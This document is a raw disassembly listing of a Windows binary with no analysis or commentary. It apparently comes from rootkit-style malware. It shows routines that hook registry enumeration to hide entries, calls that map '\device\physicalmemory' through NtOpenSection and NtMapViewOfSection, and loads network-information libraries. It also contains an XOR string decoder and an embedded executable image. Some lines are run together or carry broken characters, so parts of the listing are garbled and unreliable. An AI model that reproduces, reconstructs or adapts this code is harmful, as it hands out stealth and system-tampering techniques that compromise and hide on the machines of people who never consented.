loc_43CD2B: ; CODE XREF: sub_43CCF3+40�j
cmp word ptr [ebx], 0
jz short loc_43CD35
inc ebx
inc ebx
jmp short loc_43CD2B
; ---------------------------------------------------------------------------
loc_43CD35: ; CODE XREF: sub_43CCF3+3C�j
mov dword ptr [ebx], 560023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50DA5Ah
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CD5F
popa
jmp short loc_43CD73
; ---------------------------------------------------------------------------
loc_43CD5F: ; CODE XREF: sub_43CCF3+67�j
popa
inc [ebp+arg_4]
mov eax, [ebp+arg_1C]
test eax, eax
jz short loc_43CD6C
pop dword ptr [eax]
loc_43CD6C: ; CODE XREF: sub_43CCF3+75�j
mov eax, [ebp+arg_C]
pop dword ptr [eax]
jmp short loc_43CCF6
; ---------------------------------------------------------------------------
loc_43CD73: ; CODE XREF: sub_43CCF3+30�j
; sub_43CCF3+6A�j
add esp, 4
cmp [ebp+arg_1C], 0
jz short loc_43CD7F
add esp, 4
loc_43CD7F: ; CODE XREF: sub_43CCF3+87�j
pop ebp
retn 20h
sub_43CCF3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h
db 65h, 41h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CD9A: ; CODE XREF: .text:0043CE0F�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CDA8
push dword ptr [eax]
loc_43CDA8: ; CODE XREF: .text:0043CDA4�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CFC7h
test eax, eax
jnz short loc_43CE11
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CDCF: ; CODE XREF: .text:0043CDD5�j
cmp byte ptr [ebx], 0
jz short loc_43CDD7
inc ebx
jmp short loc_43CDCF
; ---------------------------------------------------------------------------
loc_43CDD7: ; CODE XREF: .text:0043CDD2�j
mov word ptr [ebx], 5623h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD9F8h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CDFD
popa
jmp short loc_43CE11
; ---------------------------------------------------------------------------
loc_43CDFD: ; CODE XREF: .text:0043CDF8�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CE0A
pop dword ptr [eax]
loc_43CE0A: ; CODE XREF: .text:0043CE06�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CD9A
; ---------------------------------------------------------------------------
loc_43CE11: ; CODE XREF: .text:0043CDC7�j
; .text:0043CDFB�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43CE1D
add esp, 4
loc_43CE1D: ; CODE XREF: .text:0043CE18�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
db 2 dup(0FFh), 0
; char aKernel32_dll[]
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_402A48+3F5�o
; .text:lpLibFileName�o
; char ModuleName[]
ModuleName db 'ntdll.dll',0 ; DATA XREF: sub_402226+E�o
; .text:0043CE90�o ...
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: .text:0043CEE0�o
; .text:0043CF00�o
aIphlpapi_dll db 'iphlpapi.dll',0
aInetmib1_dll db 'inetmib1.dll',0
aWsock32_dll db 'wsock32.dll',0
aUser32_dll db 'user32.dll',0
; LPCSTR off_43CE7C
off_43CE7C dd offset aProcess32next ; DATA XREF: sub_402A48+BA�r
; sub_402A48+ED�r ...
; "Process32Next"
; LPCSTR lpLibFileName
lpLibFileName dd offset aKernel32_dll ; DATA XREF: sub_402A48+9B�r
; "kernel32.dll"
off_43CE84 dd offset word_43CA1E ; DATA XREF: sub_402843+1F1�r
byte_43CE88 db 0 ; DATA XREF: sub_402A48+66�r
; sub_402A48+83�r
align 4
dd offset dword_43C940+4
dd offset ModuleName ; "ntdll.dll"
dd offset sub_43C95D
dd 1, 43C8BDh, 43CE27h, 43C8CBh, 1, 43C83Ch, 43CE27h, 43C84Ah
dd 2, 43CB35h, 43CE3Eh, 43CB41h, 1, 43CACDh, 43CE3Eh, 43CAD9h
dd 0
dd offset dword_43CBA0+3
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset sub_43CBB1
dd 1, 43CC47h, 43CE3Eh, 43CC55h, 0
dd offset dword_43CCE0+5
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset sub_43CCF3
dd 1, 43CD89h, 43CE3Eh, 43CD97h, 5 dup(0)
dd 1
dword_43CF30 dd 0Ah dword_43CF34 dd 0 ; .text:loc_4021C8�r ...
; char ProcName[]
ProcName db 'RtlInitUnicodeString',0 ; DATA XREF: sub_402226+25�o
db '^H',0
; char aNtunmapviewofs[]
aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_402226+3A�o
db 7Ah, 57h, 34h
dd 7F3640h
; char aNtopensection[]
aNtopensection db 'NtOpenSection',0 ; DATA XREF: sub_402226+4A�o
aBc db ':Bc',0
; char aNtmapviewofsec[]
aNtmapviewofsec db 'NtMapViewOfSection',0 ; DATA XREF: sub_402226+65�o
align 2
; char aRtlntstatustod[]
aRtlntstatustod db 'RtlNtStatusToDosError',0 ; DATA XREF: sub_402226+75�o
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_4022BB+95�o
align 4
aDevicePhysical: ; DATA XREF: sub_4022BB+E�o
unicode 0, <\device\physicalmemory>,0
byte_43CFE6 db 0 ; DATA XREF: sub_4022BB+5E�o
dword_43CFE7 dd 465420h byte_43CFEB db 0 ; DATA XREF: sub_4022BB+A1�o
dword_43CFEC dd 248243h word_43CFF0 dw 66h ; DATA XREF: sub_4024A8+4�r
align 4
dword_43CFF4 dd 0 dword_43CFF8 dd 11h dword_43CFFC dd 0 ; .text:loc_4024EA�r ...
aWcscmp db 'wcscmp',0 ; DATA XREF: .text:lpProcName�o
aHtons db 'htons',0
aVirtualprotect db 'VirtualProtect',0
aNua db 'NU€',0
aGetcurrentproc db 'GetCurrentProcessId',0
dd 6E694600h, 6E695764h, 41776F64h, 74306B00h, 3B6E704Dh
dd 6E655300h, 73654D64h, 65676173h, 3E530041h, 7349007Eh
dd 52646142h, 50646165h, 37007274h, 83382520h, 6C470065h
dd 6C61626Fh, 646E6946h, 6D6F7441h, 6C470041h, 6C61626Fh
dd 646E6946h, 6D6F7441h, 57h
byte_43D090 db 3 ; DATA XREF: sub_402563+87�r
align 4
; LPCSTR lpProcName
lpProcName dd offset aWcscmp ; DATA XREF: sub_402563+FB�r
; sub_402563+15E�r
; "wcscmp"
; LPCSTR lpModuleName
lpModuleName dd offset ModuleName ; DATA XREF: sub_402563+E8�r
; "ntdll.dll"
dd 5, 43D007h, 43CE65h, 7, 43D00Dh, 43CE27h, 8, 43D020h
dd 43CE27h, 9, 43D035h, 43CE71h, 0Ah, 43D049h, 43CE71h
dd 0Bh, 43D05Ah, 43CE27h, 0Ch, 43D06Eh, 43CE27h, 0Dh, 43D07Eh
dd 43CE27h
dword_43D0FC dd 6C244343h db 2Bh, 6Eh, 0
word_43D103 dw 68h ; DATA XREF: sub_402563+14B�r
byte_43D105 db 54h, 2Dh, 2Bh ; DATA XREF: sub_402563+1BD�o
dd 26646Ch
dword_43D10C dd 774E8035h db 68h, 76h, 0
byte_43D113 db 7Ah ; DATA XREF: sub_402843+DF�o
db 20h, 0
word_43D116 dw 494Eh ; DATA XREF: sub_402843+135�o
db 2Ah, 6Ch, 0
word_43D11B dw 62h ; DATA XREF: sub_402843+191�r
byte_43D11D db 6Ch, 75h, 0 ; DATA XREF: sub_402A48+3F�o
dword_43D120 dd 672F244Fh, 207564hdword_43D128 dd 33453B2Dh db 0
byte_43D12D db 21h, 2Fh, 7Ah ; DATA XREF: sub_402A48+511�o
dd 245F74h
byte_43D134 db 0 ; DATA XREF: sub_402A48+60E�o
byte_43D135 db 20h, 5Ah, 0 ; DATA XREF: sub_402A48+7DE�o
dd 7, 10h
dword_43D140 dd 0 ; sub_4032E2:loc_403308�r ...
dword_43D144 dd 7A78816Fh, 406E71hbyte_43D14C db 0 ; DATA XREF: sub_403370+9E�o
word_43D14D dw 4Eh ; DATA XREF: sub_40341E+6C�r
word_43D14F dw 57h ; DATA XREF: sub_40349A+C�r
dword_43D151 dd 813B36h byte_43D155 db 20h, 4Ah, 39h ; DATA XREF: sub_40349A+79�o
dd 4535h
dword_43D15C dd 1 dd 0Ah
dword_43D164 dd 0 ; sub_40354F:loc_40357D�r ...
byte_43D168 db 5Eh, 48h, 0 ; DATA XREF: sub_4035DB+F�o
byte_43D16B db 7Ah ; DATA XREF: sub_4035DB+1F�o
dd 36403457h
db 7Fh, 0
word_43D172 dw 6421h ; DATA XREF: sub_4036BC+17�o
dd 39436Dh, 0
dd 11h
dword_43D180 dd 0 ; sub_40372A:loc_403751�r ...
dword_43D184 dd 2062393Ah db 37h, 2Dh, 0
byte_43D18B db 55h ; DATA XREF: .text:004038E9�o
dd 80h, 6, 0Eh
dword_43D198 dd 0 ; sub_40390E:loc_403943�r ...
dword_43D19C dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0)
dd 80h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 4550h, 7014Ch, 427CB50Ah, 2 dup(0)
dd 210E00E0h, 3702010Bh, 800h, 0C00h, 1000h, 1190h, 1000h
dd 2000h, 10000000h, 1000h, 200h, 1, 0
dd 4, 0
dd 8000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 7000h, 48h, 5000h, 37Ch, 6 dup(0)
dd 6000h, 0DCh, 3000h, 54h, 12h dup(0)
dd 7865742Eh, 74h, 7BCh, 1000h, 7BCh, 400h, 3 dup(0)
dd 60000020h, 7373622Eh, 0
dd 0FE0h, 2000h, 5 dup(0)
dd 0C0000080h, 6164722Eh, 6174h, 54h, 3000h, 54h, 0C00h
dd 3 dup(0)
dd 40000020h, 7461642Eh, 61h, 0C4h, 4000h, 0C4h, 0E00h
dd 3 dup(0)
dd 0C0000040h, 6164692Eh, 6174h, 37Ch, 5000h, 37Ch, 1000h
dd 3 dup(0)
dd 0C0000060h, 6C65722Eh, 636Fh, 0E4h, 6000h, 0E4h, 1600h
dd 3 dup(0)
dd 2000020h, 6164652Eh, 6174h, 48h, 7000h, 48h, 1800h
dd 3 dup(0)
dd 40000020h, 5Ch dup(0)
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
jz short locret_43D5BB
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_43D5BB: ; CODE XREF: .text:0043D5AA�j
retn
; =============== S U B R O U T I N E =======================================
sub_43D5BC proc near ; CODE XREF: .text:0043D6E4�p
; .text:0043D712�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001000h
push large dword ptr fs:0
mov large fs:0, esp
loc_43D5D9: ; CODE XREF: sub_43D5BC+44�j
; sub_43D5BC+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43D608
cmp esi, [esp+1Ch+arg_4]
jz short loc_43D608
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43D5D9
call dword ptr [ebx+esi*4+8]
jmp short loc_43D5D9
; ---------------------------------------------------------------------------
loc_43D608: ; CODE XREF: sub_43D5BC+2A�j
; sub_43D5BC+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43D5BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D616 proc near ; CODE XREF: .text:0043D6D7�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001092h
push [ebp+arg_0]
call sub_43DCB0
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43D616 endp
; ---------------------------------------------------------------------------
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43D70B
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43D669: ; CODE XREF: .text:0043D702�j
cmp esi, 0FFFFFFFFh
jz loc_43D71A
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43D6F9
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10004034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10004038h, eax
mov eax, [edx+4]
mov ds:1000403Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10004040h
mov esi, ds:10004038h
rep movsd
lea edi, ds:10004040h
mov ds:10004038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43D6F9
js short loc_43D707
mov edi, [ebx+8]
push ebx
call sub_43D616
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43D5BC
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43D6F9: ; CODE XREF: .text:0043D67A�j
; .text:0043D6CF�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43D669
; ---------------------------------------------------------------------------
loc_43D707: ; CODE XREF: .text:0043D6D1�j
xor eax, eax
jmp short loc_43D724
; ---------------------------------------------------------------------------
loc_43D70B: ; CODE XREF: .text:0043D64E�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43D5BC
add esp, 0Ch
loc_43D71A: ; CODE XREF: .text:0043D66C�j
push 0Bh
call sub_43DD1C
add esp, 4
loc_43D724: ; CODE XREF: .text:0043D709�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43D73D
call sub_43D760
loc_43D73D: ; CODE XREF: .text:0043D736�j
call sub_43DC0F
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10004000h
call eax
loc_43D752: ; CODE XREF: .text:0043D75E�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
mov eax, 1
jmp short loc_43D752
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D760 proc near ; CODE XREF: .text:0043D738�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_43DCD4
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_43DCD4
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_43DCD4
mov [ebp+var_C], eax
push 1000401Eh
push [ebp+var_8]
call sub_43DCC8
mov ds:10004008h, eax
push 1000401Ch
push [ebp+var_4]
call sub_43DCC8
mov ds:10004004h, eax
push 1000401Ch
push [ebp+var_C]
call sub_43DCC8
add esp, 30h
mov ds:1000400Ch, eax
mov edi, ds:10004004h
or edi, edi
jz short loc_43D7D9
push 0
push edi
call sub_43DD28
add esp, 8
loc_43D7D9: ; CODE XREF: sub_43D760+6C�j
mov edi, ds:1000400Ch
or edi, edi
jz short loc_43D7F3
push 0
push edi
call sub_43DD28
add esp, 8
call sub_43D7F8
loc_43D7F3: ; CODE XREF: sub_43D760+81�j
pop edi
leave
retn
sub_43D760 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D7F8 proc near ; CODE XREF: sub_43D760+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_43DC44
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43D835
; ---------------------------------------------------------------------------
loc_43D814: ; CODE XREF: sub_43D7F8+45�j
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43D821
inc [ebp+var_C]
loc_43D821: ; CODE XREF: sub_43D7F8+24�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43D835: ; CODE XREF: sub_43D7F8+1A�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43D814
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_43DCF8
pop ecx
mov [ebp+var_8], eax
mov ds:10004010h, eax
cmp [ebp+var_8], 0
jnz short loc_43D868
xor eax, eax
jmp short loc_43D8DE
; ---------------------------------------------------------------------------
loc_43D868: ; CODE XREF: sub_43D7F8+6A�j
mov ebx, [ebp+var_10]
jmp short loc_43D8C1
; ---------------------------------------------------------------------------
loc_43D86D: ; CODE XREF: sub_43D7F8+D1�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43D8BB
push [ebp+var_4]
call sub_43DCF8
pop ecx
mov esi, [ebp+var_8]
mov ds:0[esi], eax
or eax, eax
jnz short loc_43D8A4
jmp short loc_43D8DE
; ---------------------------------------------------------------------------
loc_43D8A4: ; CODE XREF: sub_43D7F8+A8�j
push ebx
mov edi, [ebp+var_8]
push dword ptr ds:0[edi]
call sub_43DD4C
add esp, 8
add [ebp+var_8], 4
loc_43D8BB: ; CODE XREF: sub_43D7F8+91�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43D8C1: ; CODE XREF: sub_43D7F8+73�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43D86D
mov edx, [ebp+var_8]
mov dword ptr ds:0[edx], 0
mov eax, 1
loc_43D8DE: ; CODE XREF: sub_43D7F8+6E�j
; sub_43D7F8+AA�j
pop edi
pop esi
pop ebx
leave
retn
sub_43D7F8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D8E4 proc near ; CODE XREF: sub_43D98E+22�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 181h
push esi
push [ebp+arg_0]
mov eax, ds:10004098h
lea eax, ds:10002000h[eax]
push eax
call sub_43DD04
add esp, 0Ch
xor edi, edi
jmp short loc_43D92D
; ---------------------------------------------------------------------------
loc_43D913: ; CODE XREF: sub_43D8E4+4B�j
mov eax, ds:10004098h
add eax, edi
lea eax, ds:10002000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_43D92D: ; CODE XREF: sub_43D8E4+2D�j
cmp edi, esi
jl short loc_43D913
mov [ebp+var_8], 389h
mov eax, ds:10004098h
add eax, esi
mov byte ptr ds:10002000h[eax], 0
xor edi, edi
mov edi, ds:10004098h
add dword ptr ds:10004098h, 3
mov eax, ds:10004098h
lea eax, [eax+esi+4]
mov ds:10004098h, eax
inc dword ptr ds:10004098h
cmp dword ptr ds:10004098h, 0DB6h
jle short loc_43D97D
and dword ptr ds:10004098h, 0
loc_43D97D: ; CODE XREF: sub_43D8E4+90�j
mov [ebp+var_C], 9Ch
lea eax, [edi+10002000h]
pop edi
pop esi
leave
retn
sub_43D8E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D98E proc near ; CODE XREF: .text:0043DB27�p
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
lea edi, [ebp+var_5]
lea esi, ds:1000409Ch
xor ecx, ecx
inc ecx
rep movsb
call sub_43DC80
push 5
push 100040BDh
call sub_43D8E4
add esp, 8
push eax
push 0
push 1F0001h
call sub_43DCA4
mov [ebp+var_4], eax
or eax, eax
jz short loc_43D9E9
mov [ebp+var_C], 4FA1h
inc [ebp+var_C]
push eax
call sub_43DC5C
mov [ebp+var_E], 6C6Dh
inc [ebp+var_E]
xor eax, eax
inc eax
loc_43D9E9: ; CODE XREF: sub_43D98E+3C�j
pop edi
pop esi
leave
retn
sub_43D98E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D9ED proc near ; CODE XREF: .text:0043DB5B�p
var_10A = byte ptr -10Ah
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_43DC38
call sub_43DC68
mov ecx, edi
or eax, 0FFFFFFFFh
loc_43DA0B: ; CODE XREF: sub_43D9ED+23�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DA0B
mov ebx, eax
mov [ebp+var_6], bx
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_43DA40
; ---------------------------------------------------------------------------
loc_43DA22: ; CODE XREF: sub_43D9ED+59�j
movzx eax, [ebp+var_2]
cmp byte ptr [edi+eax], 5Ch
jnz short loc_43DA3C
call sub_43DC2C
inc [ebp+var_2]
call sub_43DC80
jmp short loc_43DA48
; ---------------------------------------------------------------------------
loc_43DA3C: ; CODE XREF: sub_43D9ED+3D�j
dec [ebp+var_2]
loc_43DA40: ; CODE XREF: sub_43D9ED+33�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_43DA22
loc_43DA48: ; CODE XREF: sub_43D9ED+4D�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_43DA86
mov [ebp+var_4], 0
jmp short loc_43DA74
; ---------------------------------------------------------------------------
loc_43DA5A: ; CODE XREF: sub_43D9ED+97�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_2]
mov ecx, eax
add ecx, edx
mov dl, [edi+ecx]
mov [ebp+eax+var_10A], dl
inc [ebp+var_4]
loc_43DA74: ; CODE XREF: sub_43D9ED+6B�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_43DA5A
loc_43DA86: ; CODE XREF: sub_43D9ED+63�j
mov esi, 6BBCh
add esi, 7D41h
lea eax, [ebp+var_10A]
push eax
call sub_43DC98
call sub_43DC8C
pop edi
pop esi
pop ebx
leave
retn
sub_43D9ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DAA7 proc near ; CODE XREF: .text:0043DBAE�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
call sub_43DC38
push 100040BBh
push [ebp+arg_0]
call sub_43DD40
add esp, 8
lea edi, [ebp+var_8]
lea esi, ds:1000409Dh
movsd
movsd
pop edi
pop esi
leave
retn
sub_43DAA7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
mov ax, ds:100040A5h
mov [ebp-217h], ax
mov eax, ds:10004094h
add eax, 698h
push eax
call sub_43DD34
mov byte ptr [ebp-100h], 84h
sub byte ptr [ebp-100h], 68h
mov eax, ds:10004090h
mov edx, eax
add edx, 5
push edx
mov edx, 0Fh
sub edx, ds:10004094h
push edx
mov edx, 4
sub edx, eax
push edx
call sub_43D98E
add esp, 10h
or eax, eax
jz short loc_43DB3B
xor eax, eax
inc eax
jmp loc_43DBE4
; ---------------------------------------------------------------------------
loc_43DB3B: ; CODE XREF: .text:0043DB31�j
push 104h
lea eax, [ebp-205h]
push eax
push dword ptr [ebp+8]
call sub_43DC50
call sub_43DC38
lea eax, [ebp-205h]
push eax
call sub_43D9ED
mov byte ptr [ebp-101h], 1Bh
add byte ptr [ebp-101h], 1
lea edi, [ebp-215h]
lea esi, ds:100040A7h
mov ecx, 4
rep movsd
push 0FFh
lea eax, [ebp-0FFh]
push eax
call sub_43DC74
mov eax, ds:100040B7h
mov [ebp-21Bh], eax
call sub_43DC38
call sub_43DC2C
lea eax, [ebp-0FFh]
push eax
call sub_43DAA7
call sub_43DC80
lea eax, [ebp-215h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_43DD40
add esp, 10h
push 1
lea eax, [ebp-0FFh]
push eax
call sub_43DCBC
call sub_43DC68
xor eax, eax
inc eax
loc_43DBE4: ; CODE XREF: .text:0043DB36�j
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 4
push eax
fnstcw word ptr [esp]
mov eax, [esp]
btr dword ptr [esp], 8
or word ptr [esp], 200h
; START OF FUNCTION CHUNK FOR sub_43DC0F
loc_43DBFE: ; CODE XREF: sub_43DC0F+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
loc_43DC02: ; CODE XREF: .text:0043DC0D�j
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_43DC0F
; ---------------------------------------------------------------------------
push eax
fnstcw word ptr [esp]
pop eax
jmp short loc_43DC02
; =============== S U B R O U T I N E =======================================
sub_43DC0F proc near ; CODE XREF: .text:loc_43D73D�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043DBFE SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_43DBFE
sub_43DC0F endp
; ---------------------------------------------------------------------------
align 10h
jmp dword ptr ds:100050E8h
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC2C proc near ; CODE XREF: sub_43D9ED+3F�p
; .text:0043DBA2�p
jmp dword ptr ds:100050ECh
sub_43DC2C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC38 proc near ; CODE XREF: sub_43D9ED+F�p
; sub_43DAA7+7�p ...
jmp dword ptr ds:100050F0h
sub_43DC38 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC44 proc near ; CODE XREF: sub_43D7F8+10�p
jmp dword ptr ds:100050F4h
sub_43DC44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC50 proc near ; CODE XREF: .text:0043DB4A�p
jmp dword ptr ds:100050F8h
sub_43DC50 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC5C proc near ; CODE XREF: sub_43D98E+49�p
jmp dword ptr ds:100050FCh
sub_43DC5C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC68 proc near ; CODE XREF: sub_43D9ED+14�p
; .text:0043DBDC�p
jmp dword ptr ds:10005100h
sub_43DC68 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC74 proc near ; CODE XREF: .text:0043DB8D�p
jmp dword ptr ds:10005104h
sub_43DC74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC80 proc near ; CODE XREF: sub_43D98E+16�p
; sub_43D9ED+48�p ...
jmp dword ptr ds:10005108h
sub_43DC80 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC8C proc near ; CODE XREF: sub_43D9ED+B0�p
jmp dword ptr ds:1000510Ch
sub_43DC8C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43DC98 proc near ; CODE XREF: sub_43D9ED+AB�p
jmp dword ptr ds:10005110h
sub_43DC98 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
